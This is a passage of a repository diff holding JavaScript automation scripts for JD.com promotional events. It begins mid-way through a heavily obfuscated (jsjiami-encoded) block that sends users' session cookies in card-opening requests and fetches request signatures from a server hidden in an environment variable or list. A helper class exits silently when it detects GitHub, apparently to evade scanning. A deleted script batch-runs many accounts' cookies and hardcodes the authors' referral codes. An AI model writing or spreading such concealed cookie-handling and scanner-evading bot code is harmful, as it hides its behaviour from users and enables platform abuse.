x48\x5a\x57\x4e\x72\x62\x79\x6b\x67\x54\x57\x39\x69\x61\x57\x78\x6c\x4c\x7a\x45\x31\x52\x54\x45\x30\x4f\x44\x74\x7a\x64\x58\x42\x77\x62\x33\x4a\x30\x53\x6b\x52\x54\x53\x46\x64\x4c\x4c\x7a\x45\x3d','\x61\x57\x4a\x49\x5a\x48\x45\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x7a\x61\x47\x39\x77\x62\x57\x56\x74\x59\x6d\x56\x79\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74\x4c\x33\x4e\x6f\x62\x33\x42\x6a\x59\x58\x4a\x6b\x4c\x7a\x39\x32\x5a\x57\x35\x6b\x5a\x58\x4a\x4a\x5a\x44\x30\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x67\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x56\x63\x6d\x77\x3d','\x5a\x55\x64\x48\x65\x6e\x67\x3d','\x61\x58\x46\x34\x57\x55\x38\x3d','\x59\x56\x52\x6b\x65\x6d\x55\x3d','\x62\x56\x52\x51\x65\x55\x63\x3d','\x5a\x32\x56\x30','\x6a\x6b\x73\x6a\x45\x69\x48\x61\x6d\x69\x64\x53\x2e\x63\x54\x6f\x6d\x43\x2e\x76\x36\x68\x6c\x45\x45\x56\x50\x75\x56\x3d\x3d'];if(function(_0x47dca4,_0x2e45a0,_0x2d0d38){function _0x358c40(_0x4e0fee,_0x44d395,_0x5f1629,_0x6d2cae,_0x379df8,_0x59c1d4){_0x44d395=_0x44d395>>0x8,_0x379df8='po';var _0x24e0cd='shift',_0x197297='push',_0x59c1d4='‮';if(_0x44d395<_0x4e0fee){while(--_0x4e0fee){_0x6d2cae=_0x47dca4[_0x24e0cd]();if(_0x44d395===_0x4e0fee&&_0x59c1d4==='‮'&&_0x59c1d4['length']===0x1){_0x44d395=_0x6d2cae,_0x5f1629=_0x47dca4[_0x379df8+'p']();}else if(_0x44d395&&_0x5f1629['replace'](/[kEHdSTChlEEVPuV=]/g,'')===_0x44d395){_0x47dca4[_0x197297](_0x6d2cae);}}_0x47dca4[_0x197297](_0x47dca4[_0x24e0cd]());}return 0xdaf2e;};return _0x358c40(++_0x2e45a0,_0x2d0d38)>>_0x2e45a0^_0x2d0d38;}(_0x1acd,0x1d5,0x1d500),_0x1acd){_0xod7_=_0x1acd['length']^0x1d5;};function _0x27de(_0x4ab799,_0x2148e0){_0x4ab799=~~'0x'['concat'](_0x4ab799['slice'](0x1));var _0x38aa70=_0x1acd[_0x4ab799];if(_0x27de['HEabFd']===undefined&&'‮'['length']===0x1){(function(){var _0x48587b=function(){var _0x226fa7;try{_0x226fa7=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x302471){_0x226fa7=window;}return _0x226fa7;};var _0x2dcb25=_0x48587b();var _0x5d0b0e='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x2dcb25['atob']||(_0x2dcb25['atob']=function(_0x41138d){var _0x37290e=String(_0x41138d)['replace'](/=+$/,'');for(var _0x1da2f9=0x0,_0x27e844,_0x496c4d,_0x55ec30=0x0,_0x46993b='';_0x496c4d=_0x37290e['charAt'](_0x55ec30++);~_0x496c4d&&(_0x27e844=_0x1da2f9%0x4?_0x27e844*0x40+_0x496c4d:_0x496c4d,_0x1da2f9++%0x4)?_0x46993b+=String['fromCharCode'](0xff&_0x27e844>>(-0x2*_0x1da2f9&0x6)):0x0){_0x496c4d=_0x5d0b0e['indexOf'](_0x496c4d);}return _0x46993b;});}());_0x27de['ciicrd']=function(_0x35e622){var _0x1ca022=atob(_0x35e622);var _0x460af0=[];for(var _0x27de2b=0x0,_0x1b5b31=_0x1ca022['length'];_0x27de2b<_0x1b5b31;_0x27de2b++){_0x460af0+='%'+('00'+_0x1ca022['charCodeAt'](_0x27de2b)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x460af0);};_0x27de['qeLOEi']={};_0x27de['HEabFd']=!![];}var _0x4e1a4f=_0x27de['qeLOEi'][_0x4ab799];if(_0x4e1a4f===undefined){_0x38aa70=_0x27de['ciicrd'](_0x38aa70);_0x27de['qeLOEi'][_0x4ab799]=_0x38aa70;}else{_0x38aa70=_0x4e1a4f;}return _0x38aa70;};function getShopOpenCardInfo(_0x2dfe13,_0x2a9c59){var _0x169e2b={'\x69\x71\x78\x59\x4f':function(_0x237960,_0x2865f7){return _0x237960===_0x2865f7;},'\x61\x54\x64\x7a\x65':_0x27de('‮0'),'\x6d\x54\x50\x79\x47':function(_0x5db734){return _0x5db734();},'\x78\x64\x6e\x42\x52':function(_0x27ef1f,_0x2696d1){return _0x27ef1f(_0x2696d1);},'\x52\x4a\x45\x53\x7a':_0x27de('‫1'),'\x6c\x76\x65\x76\x78':_0x27de('‫2'),'\x63\x58\x6a\x72\x70':_0x27de('‫3'),'\x69\x62\x48\x64\x71':_0x27de('‮4'),'\x65\x47\x47\x7a\x78':_0x27de('‫5')};let _0x4540b3={'\x75\x72\x6c':_0x27de('‮6')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,JSON[_0x27de('‫8')](_0x2dfe13))+_0x27de('‮9'),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x169e2b[_0x27de('‮a')],'\x41\x63\x63\x65\x70\x74':_0x169e2b[_0x27de('‮b')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x169e2b[_0x27de('‫c')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x169e2b[_0x27de('‫12')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x2a9c59+_0x27de('‮14')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x169e2b[_0x27de('‮16')]}};return new Promise(_0x24d014=>{var _0x45d140={'\x4b\x72\x53\x57\x63':function(_0x564cc4,_0x316683){return _0x169e2b[_0x27de('‫17')](_0x564cc4,_0x316683);},'\x4c\x63\x4b\x6e\x79':_0x169e2b[_0x27de('‫18')],'\x54\x45\x49\x61\x6f':function(_0x32cebc){return _0x169e2b[_0x27de('‫19')](_0x32cebc);}};$[_0x27de('‫1a')](_0x4540b3,(_0x497df1,_0x18ad2f,_0x1d037c)=>{if(_0x45d140[_0x27de('‮1b')](_0x45d140[_0x27de('‮1c')],_0x45d140[_0x27de('‮1c')])){try{if(_0x497df1){console[_0x27de('‫1d')](_0x497df1);}else{res=JSON[_0x27de('‫1e')](_0x1d037c);if(res[_0x27de('‮1f')]){if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}}catch(_0x487efd){console[_0x27de('‫1d')](_0x487efd);}finally{_0x45d140[_0x27de('‮25')](_0x24d014);}}else{console[_0x27de('‫1d')](_0x497df1);}});});}async function bindWithVender(_0x4bf9aa,_0x5a230c){var _0x5180ad={'\x4d\x59\x68\x4c\x43':function(_0x396660){return _0x396660();},'\x6d\x77\x78\x44\x6d':function(_0x4b2169,_0x405a0d){return _0x4b2169!==_0x405a0d;},'\x7a\x56\x69\x61\x6e':_0x27de('‫26'),'\x45\x41\x49\x42\x41':_0x27de('‫27'),'\x49\x6a\x73\x62\x4a':function(_0xcf4ea9,_0x3221b8){return _0xcf4ea9===_0x3221b8;},'\x55\x4b\x72\x68\x55':_0x27de('‫28'),'\x57\x6b\x62\x48\x4c':_0x27de('‫29'),'\x4c\x52\x48\x6a\x4c':_0x27de('‮2a'),'\x4f\x43\x43\x4e\x77':_0x27de('‫2b'),'\x57\x5a\x73\x59\x5a':_0x27de('‫2c'),'\x57\x73\x6b\x70\x78':_0x27de('‮2d'),'\x45\x64\x7a\x6d\x68':function(_0x148959,_0x176008,_0x319ba8){return _0x148959(_0x176008,_0x319ba8);},'\x50\x75\x57\x6e\x46':_0x27de('‮2e'),'\x47\x76\x6e\x52\x55':_0x27de('‫1'),'\x46\x56\x6a\x4b\x45':_0x27de('‫2'),'\x54\x6e\x62\x73\x4b':_0x27de('‫3'),'\x6a\x79\x46\x4f\x50':_0x27de('‮4'),'\x61\x4c\x7a\x6b\x57':function(_0x3768db,_0x1db8ba){return _0x3768db(_0x1db8ba);},'\x56\x6b\x6e\x6f\x74':_0x27de('‫5')};return h5st=await _0x5180ad[_0x27de('‮2f')](geth5st,_0x5180ad[_0x27de('‮30')],_0x4bf9aa),opt={'\x75\x72\x6c':_0x27de('‮31')+h5st,'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x5180ad[_0x27de('‮32')],'\x41\x63\x63\x65\x70\x74':_0x5180ad[_0x27de('‫33')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x5180ad[_0x27de('‮34')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x5180ad[_0x27de('‫35')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x5a230c+_0x27de('‮36')+_0x5180ad[_0x27de('‮37')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x5180ad[_0x27de('‫38')]}},new Promise(_0x2c2848=>{var _0x1f470d={'\x69\x50\x64\x65\x78':function(_0x4c0bea){return _0x5180ad[_0x27de('‫39')](_0x4c0bea);},'\x42\x77\x65\x53\x57':function(_0x240905,_0x2118e5){return _0x5180ad[_0x27de('‫3a')](_0x240905,_0x2118e5);},'\x79\x6e\x59\x71\x72':_0x5180ad[_0x27de('‫3b')],'\x70\x6b\x4f\x75\x73':_0x5180ad[_0x27de('‮3c')],'\x5a\x65\x59\x6e\x58':function(_0x2ff734,_0x50b6d9){return _0x5180ad[_0x27de('‮3d')](_0x2ff734,_0x50b6d9);},'\x69\x58\x4d\x4f\x79':_0x5180ad[_0x27de('‫3e')],'\x6d\x56\x77\x79\x58':function(_0x43cb7f,_0x5f0fa8){return _0x5180ad[_0x27de('‮3d')](_0x43cb7f,_0x5f0fa8);},'\x50\x62\x4f\x41\x42':_0x5180ad[_0x27de('‫3f')],'\x4f\x78\x6d\x55\x66':_0x5180ad[_0x27de('‫40')],'\x49\x62\x44\x6d\x51':_0x5180ad[_0x27de('‫41')],'\x62\x64\x67\x73\x4d':_0x5180ad[_0x27de('‫42')],'\x5a\x4b\x78\x4a\x4e':_0x5180ad[_0x27de('‮43')]};$[_0x27de('‫1a')](opt,(_0x311afb,_0x3b7aab,_0x4c2873)=>{var _0x53384e={'\x6d\x4d\x51\x6b\x76':function(_0x26e196){return _0x1f470d[_0x27de('‫44')](_0x26e196);}};try{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫46')],_0x1f470d[_0x27de('‮47')])){if(_0x311afb){if(_0x1f470d[_0x27de('‫48')](_0x1f470d[_0x27de('‫49')],_0x1f470d[_0x27de('‫49')])){console[_0x27de('‫1d')](_0x311afb);}else{console[_0x27de('‫1d')](error);}}else{if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4b')],_0x1f470d[_0x27de('‮4c')])){_0x53384e[_0x27de('‮4d')](_0x2c2848);}else{res=JSON[_0x27de('‫1e')](_0x4c2873);if(res[_0x27de('‮1f')]){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4e')],_0x1f470d[_0x27de('‫4e')])){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}else{console[_0x27de('‫1d')](_0x311afb);}}}}}else{Host=process[_0x27de('‮51')][_0x27de('‫52')];}}catch(_0x317968){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‮53')],_0x1f470d[_0x27de('‮53')])){console[_0x27de('‫1d')](_0x317968);}else{$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}finally{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫54')],_0x1f470d[_0x27de('‫54')])){_0x1f470d[_0x27de('‫44')](_0x2c2848);}else{_0x1f470d[_0x27de('‫44')](_0x2c2848);}}});});}function geth5st(_0x1c2dc4,_0x38bbf9){var _0xad3eae={'\x76\x59\x42\x64\x48':function(_0xb6682a,_0x1dbeb1){return _0xb6682a===_0x1dbeb1;},'\x42\x4d\x46\x6b\x79':_0x27de('‮55'),'\x69\x75\x7a\x6b\x51':function(_0x521e0c,_0x1ffbd9){return _0x521e0c!==_0x1ffbd9;},'\x67\x48\x77\x45\x7a':_0x27de('‮56'),'\x53\x65\x4c\x46\x71':_0x27de('‮57'),'\x45\x6e\x58\x7a\x59':function(_0x4fa54e,_0x1f1dc2){return _0x4fa54e===_0x1f1dc2;},'\x50\x7a\x78\x71\x48':_0x27de('‮58'),'\x4e\x54\x41\x51\x50':function(_0x3fd51b,_0x32a444){return _0x3fd51b(_0x32a444);},'\x6b\x45\x71\x7a\x71':_0x27de('‫59'),'\x6a\x56\x58\x70\x71':_0x27de('‫5a'),'\x41\x6d\x4e\x72\x49':_0x27de('‮5b'),'\x71\x69\x42\x77\x67':_0x27de('‫5c'),'\x6c\x59\x56\x78\x6b':function(_0x2a05e2,_0x15824){return _0x2a05e2*_0x15824;},'\x44\x66\x5a\x6f\x68':_0x27de('‫5d'),'\x58\x43\x7a\x6e\x76':function(_0x46d10b,_0x5b5da1){return _0x46d10b*_0x5b5da1;}};return new Promise(async _0x573221=>{var _0x1c0efb={'\x4a\x47\x49\x4a\x4a':function(_0x30195c,_0x3fe97e){return _0xad3eae[_0x27de('‮5e')](_0x30195c,_0x3fe97e);},'\x63\x4c\x75\x59\x57':_0xad3eae[_0x27de('‫5f')],'\x4a\x65\x6d\x76\x48':function(_0x41b061,_0x2c0980){return _0xad3eae[_0x27de('‫60')](_0x41b061,_0x2c0980);},'\x54\x53\x65\x61\x46':_0xad3eae[_0x27de('‫61')],'\x66\x57\x66\x4f\x54':_0xad3eae[_0x27de('‮62')],'\x7a\x4f\x48\x74\x48':function(_0x1029f8,_0x21337a){return _0xad3eae[_0x27de('‮63')](_0x1029f8,_0x21337a);},'\x54\x5a\x6e\x42\x6a':_0xad3eae[_0x27de('‫64')],'\x6b\x47\x41\x51\x44':function(_0x1b9d1f,_0x3ee921){return _0xad3eae[_0x27de('‫65')](_0x1b9d1f,_0x3ee921);}};let _0x23db17={'\x61\x70\x70\x49\x64':_0xad3eae[_0x27de('‫66')],'\x62\x6f\x64\x79':{'\x61\x70\x70\x69\x64':_0xad3eae[_0x27de('‫67')],'\x66\x75\x6e\x63\x74\x69\x6f\x6e\x49\x64':_0x1c2dc4,'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x38bbf9),'\x63\x6c\x69\x65\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e':_0xad3eae[_0x27de('‫68')],'\x63\x6c\x69\x65\x6e\x74':'\x48\x35','\x61\x63\x74\x69\x76\x69\x74\x79\x49\x64':$[_0x27de('‮24')]},'\x63\x61\x6c\x6c\x62\x61\x63\x6b\x41\x6c\x6c':!![]};let _0x2402da='';let _0x25911c=[_0xad3eae[_0x27de('‮69')]];if(process[_0x27de('‮51')][_0x27de('‫52')]){_0x2402da=process[_0x27de('‮51')][_0x27de('‫52')];}else{_0x2402da=_0x25911c[Math[_0x27de('‫6a')](_0xad3eae[_0x27de('‫6b')](Math[_0x27de('‫6c')](),_0x25911c[_0x27de('‮6d')]))];}let _0x5f5ad9={'\x75\x72\x6c':_0x27de('‮6e'),'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x23db17),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x2402da,'Content-Type':_0xad3eae[_0x27de('‮6f')]},'\x74\x69\x6d\x65\x6f\x75\x74':_0xad3eae[_0x27de('‫70')](0x1e,0x3e8)};$[_0x27de('‮71')](_0x5f5ad9,async(_0x4a1749,_0x300e08,_0x23db17)=>{if(_0x1c0efb[_0x27de('‫72')](_0x1c0efb[_0x27de('‫73')],_0x1c0efb[_0x27de('‫73')])){try{if(_0x4a1749){if(_0x1c0efb[_0x27de('‮74')](_0x1c0efb[_0x27de('‮75')],_0x1c0efb[_0x27de('‮76')])){_0x23db17=await geth5st[_0x27de('‮77')](this,arguments);}else{if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}else{}}catch(_0x580180){if(_0x1c0efb[_0x27de('‫78')](_0x1c0efb[_0x27de('‮79')],_0x1c0efb[_0x27de('‮79')])){$[_0x27de('‫7a')](_0x580180,_0x300e08);}else{if(_0x4a1749){console[_0x27de('‫1d')](_0x4a1749);}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}}}finally{_0x1c0efb[_0x27de('‫7b')](_0x573221,_0x23db17);}}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}});});};_0xod7='jsjiami.com.v6'; -function Env(t,e){"undefined"!=typeof process&&JSON.stringify(process.env).indexOf("GITHUB")>-1&&process.exit(0);class s{constructor(t){this.env=t}send(t,e="GET"){t="string"==typeof t?{url:t}:t;let s=this.get;return"POST"===e&&(s=this.post),new Promise((e,i)=>{s.call(this,t,(t,s,r)=>{t?i(t):e(s)})})}get(t){return this.send.call(this.env,t)}post(t){return this.send.call(this.env,t,"POST")}}return new class{constructor(t,e){this.name=t,this.http=new s(this),this.data=null,this.dataFile="box.dat",this.logs=[],this.isMute=!1,this.isNeedRewrite=!1,this.logSeparator="\n",this.startTime=(new Date).getTime(),Object.assign(this,e),this.log("",`🔔${this.name}, 开始!`)}isNode(){return"undefined"!=typeof module&&!!module.exports}isQuanX(){return"undefined"!=typeof $task}isSurge(){return"undefined"!=typeof $httpClient&&"undefined"==typeof $loon}isLoon(){return"undefined"!=typeof $loon}toObj(t,e=null){try{return JSON.parse(t)}catch{return e}}toStr(t,e=null){try{return JSON.stringify(t)}catch{return e}}getjson(t,e){let s=e;const i=this.getdata(t);if(i)try{s=JSON.parse(this.getdata(t))}catch{}return s}setjson(t,e){try{return this.setdata(JSON.stringify(t),e)}catch{return!1}}getScript(t){return new Promise(e=>{this.get({url:t},(t,s,i)=>e(i))})}runScript(t,e){return new Promise(s=>{let i=this.getdata("@chavy_boxjs_userCfgs.httpapi");i=i?i.replace(/\n/g,"").trim():i;let r=this.getdata("@chavy_boxjs_userCfgs.httpapi_timeout");r=r?1*r:20,r=e&&e.timeout?e.timeout:r;const[o,h]=i.split("@"),n={url:`http://${h}/v1/scripting/evaluate`,body:{script_text:t,mock_type:"cron",timeout:r},headers:{"X-Key":o,Accept:"*/*"}};this.post(n,(t,e,i)=>s(i))}).catch(t=>this.logErr(t))}loaddata(){if(!this.isNode())return{};{this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e);if(!s&&!i)return{};{const i=s?t:e;try{return JSON.parse(this.fs.readFileSync(i))}catch(t){return{}}}}}writedata(){if(this.isNode()){this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e),r=JSON.stringify(this.data);s?this.fs.writeFileSync(t,r):i?this.fs.writeFileSync(e,r):this.fs.writeFileSync(t,r)}}lodash_get(t,e,s){const i=e.replace(/\[(\d+)\]/g,".$1").split(".");let r=t;for(const t of i)if(r=Object(r)[t],void 0===r)return s;return r}lodash_set(t,e,s){return Object(t)!==t?t:(Array.isArray(e)||(e=e.toString().match(/[^.[\]]+/g)||[]),e.slice(0,-1).reduce((t,s,i)=>Object(t[s])===t[s]?t[s]:t[s]=Math.abs(e[i+1])>>0==+e[i+1]?[]:{},t)[e[e.length-1]]=s,t)}getdata(t){let e=this.getval(t);if(/^@/.test(t)){const[,s,i]=/^@(.*?)\.(.*?)$/.exec(t),r=s?this.getval(s):"";if(r)try{const t=JSON.parse(r);e=t?this.lodash_get(t,i,""):e}catch(t){e=""}}return e}setdata(t,e){let s=!1;if(/^@/.test(e)){const[,i,r]=/^@(.*?)\.(.*?)$/.exec(e),o=this.getval(i),h=i?"null"===o?null:o||"{}":"{}";try{const e=JSON.parse(h);this.lodash_set(e,r,t),s=this.setval(JSON.stringify(e),i)}catch(e){const o={};this.lodash_set(o,r,t),s=this.setval(JSON.stringify(o),i)}}else s=this.setval(t,e);return s}getval(t){return this.isSurge()||this.isLoon()?$persistentStore.read(t):this.isQuanX()?$prefs.valueForKey(t):this.isNode()?(this.data=this.loaddata(),this.data[t]):this.data&&this.data[t]||null}setval(t,e){return this.isSurge()||this.isLoon()?$persistentStore.write(t,e):this.isQuanX()?$prefs.setValueForKey(t,e):this.isNode()?(this.data=this.loaddata(),this.data[e]=t,this.writedata(),!0):this.data&&this.data[e]||null}initGotEnv(t){this.got=this.got?this.got:require("got"),this.cktough=this.cktough?this.cktough:require("tough-cookie"),this.ckjar=this.ckjar?this.ckjar:new this.cktough.CookieJar,t&&(t.headers=t.headers?t.headers:{},void 0===t.headers.Cookie&&void 0===t.cookieJar&&(t.cookieJar=this.ckjar))}get(t,e=(()=>{})){t.headers&&(delete t.headers["Content-Type"],delete t.headers["Content-Length"]),this.isSurge()||this.isLoon()?(this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.get(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)})):this.isQuanX()?(this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t))):this.isNode()&&(this.initGotEnv(t),this.got(t).on("redirect",(t,e)=>{try{if(t.headers["set-cookie"]){const s=t.headers["set-cookie"].map(this.cktough.Cookie.parse).toString();s&&this.ckjar.setCookieSync(s,null),e.cookieJar=this.ckjar}}catch(t){this.logErr(t)}}).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)}))}post(t,e=(()=>{})){if(t.body&&t.headers&&!t.headers["Content-Type"]&&(t.headers["Content-Type"]="application/x-www-form-urlencoded"),t.headers&&delete t.headers["Content-Length"],this.isSurge()||this.isLoon())this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.post(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)});else if(this.isQuanX())t.method="POST",this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t));else if(this.isNode()){this.initGotEnv(t);const{url:s,...i}=t;this.got.post(s,i).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)})}}time(t,e=null){const s=e?new Date(e):new Date;let i={"M+":s.getMonth()+1,"d+":s.getDate(),"H+":s.getHours(),"m+":s.getMinutes(),"s+":s.getSeconds(),"q+":Math.floor((s.getMonth()+3)/3),S:s.getMilliseconds()};/(y+)/.test(t)&&(t=t.replace(RegExp.$1,(s.getFullYear()+"").substr(4-RegExp.$1.length)));for(let e in i)new RegExp("("+e+")").test(t)&&(t=t.replace(RegExp.$1,1==RegExp.$1.length?i[e]:("00"+i[e]).substr((""+i[e]).length)));return t}msg(e=t,s="",i="",r){const o=t=>{if(!t)return t;if("string"==typeof t)return this.isLoon()?t:this.isQuanX()?{"open-url":t}:this.isSurge()?{url:t}:void 0;if("object"==typeof t){if(this.isLoon()){let e=t.openUrl||t.url||t["open-url"],s=t.mediaUrl||t["media-url"];return{openUrl:e,mediaUrl:s}}if(this.isQuanX()){let e=t["open-url"]||t.url||t.openUrl,s=t["media-url"]||t.mediaUrl;return{"open-url":e,"media-url":s}}if(this.isSurge()){let e=t.url||t.openUrl||t["open-url"];return{url:e}}}};if(this.isMute||(this.isSurge()||this.isLoon()?$notification.post(e,s,i,o(r)):this.isQuanX()&&$notify(e,s,i,o(r))),!this.isMuteLog){let t=["","==============📣系统通知📣=============="];t.push(e),s&&t.push(s),i&&t.push(i),console.log(t.join("\n")),this.logs=this.logs.concat(t)}}log(...t){t.length>0&&(this.logs=[...this.logs,...t]),console.log(t.join(this.logSeparator))}logErr(t,e){const s=!this.isSurge()&&!this.isQuanX()&&!this.isLoon();s?this.log("",`❗️${this.name}, 错误!`,t.stack):this.log("",`❗️${this.name}, 错误!`,t)}wait(t){return new Promise(e=>setTimeout(e,t))}done(t={}){const e=(new Date).getTime(),s=(e-this.startTime)/1e3;this.log("",`🔔${this.name}, 结束! 🕛 ${s} 秒`),this.log(),(this.isSurge()||this.isQuanX()||this.isLoon())&&$done(t)}}(t,e)} diff --git a/jd_lzdz1_customized525.js b/jd_lzdz1_customized525.js deleted file mode 100644 index f21387a..0000000 --- a/jd_lzdz1_customized525.js +++ /dev/null @@ -1,510 +0,0 @@ -/* -快乐自定义 宅家云出游 -*/ -const $ = new Env("快乐自定义 宅家云出游"); -const jdCookieNode = $.isNode() ? require('./jdCookie.js') : ''; -const notify = $.isNode() ? require('./sendNotify') : ''; -let cookiesArr = [], cookie = '', message = ''; -let ownCode = null; -if ($.isNode()) { - Object.keys(jdCookieNode).forEach((item) => { - cookiesArr.push(jdCookieNode[item]) - }) - if (process.env.JD_DEBUG && process.env.JD_DEBUG === 'false') console.log = () => { }; -} else { - let cookiesData = $.getdata('CookiesJD') || "[]"; - cookiesData = JSON.parse(cookiesData); - cookiesArr = cookiesData.map(item => item.cookie); - cookiesArr.reverse(); - cookiesArr.push(...[$.getdata('CookieJD2'), $.getdata('CookieJD')]); - cookiesArr.reverse(); - cookiesArr = cookiesArr.filter(item => !!item); -} -!(async () => { - if (!cookiesArr[0]) { - $.msg($.name, '【提示】请先获取京东账号一cookie\n直接使用NobyDa的京东签到获取', 'https://bean.m.jd.com/bean/signIndex.action', { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - return; - } - - // authorCodeList = await getAuthorCodeList('https://gitee.com/fatelight/dongge/raw/master/dongge/lzdz1_dapai.json') - // if(authorCodeList === '404: Not Found'){ - // authorCodeList = [ - // 'd259bceb218e40af9490693e8f48a370', - // ] - // } - - for (let i = 0; i < cookiesArr.length; i++) { - if (cookiesArr[i]) { - cookie = cookiesArr[i] - originCookie = cookiesArr[i] - newCookie = '' - $.UserName = decodeURIComponent(cookie.match(/pt_pin=(.+?);/) && cookie.match(/pt_pin=(.+?);/)[1]) - $.index = i + 1; - $.isLogin = true; - $.nickName = ''; - await checkCookie(); - console.log(`\n******开始【京东账号${$.index}】${$.nickName || $.UserName}*********\n`); - if (!$.isLogin) { - $.msg($.name, `【提示】cookie已失效`, `京东账号${$.index} ${$.nickName || $.UserName}\n请重新登录获取\nhttps://bean.m.jd.com/bean/signIndex.action`, { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - if ($.isNode()) { - // await notify.sendNotify(`${$.name}cookie已失效 - ${$.UserName}`, `京东账号${$.index} ${$.UserName}\n请重新登录获取cookie`); - } - continue - } - $.bean = 0; - $.ADID = getUUID('xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx', 1); - $.UUID = getUUID('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'); - authorCodeList = [ - 'a16bae1034134a3c8f7563339cfe5ce8', - '9d0bb52b319f414a8da4bdb33ff2b51a', - 'cdef743337234a22bd34f7817162a3e7', - '2fcda8cfd62142ae84171d2129af07ea', - '578b34279f684724811c512e9f27dd86' - ] - // $.authorCode = authorCodeList[random(0, authorCodeList.length)] - $.authorCode = ownCode ? ownCode : authorCodeList[random(0, authorCodeList.length)] - $.authorNum = `${random(1000000, 9999999)}` - $.randomCode = random(1000000, 9999999) - $.activityId = 'dz730c272a4834c1d8fd2e295a008e' - $.activityShopId = '1000002396' - $.activityUrl = `https://lzdz1-isv.isvjd.com/dingzhi/dz/openCard/activity/${$.authorNum}?activityId=${$.activityId}&shareUuid=${encodeURIComponent($.authorCode)}&adsource=null&shareuserid4minipg=null&shopid=${$.activityShopId}&lng=00.000000&lat=00.000000&sid=&un_area=` - await marry(); - await $.wait(1000) - if ($.bean > 0) { - message += `\n【京东账号${$.index}】${$.nickName || $.UserName} \n └ 获得 ${$.bean} 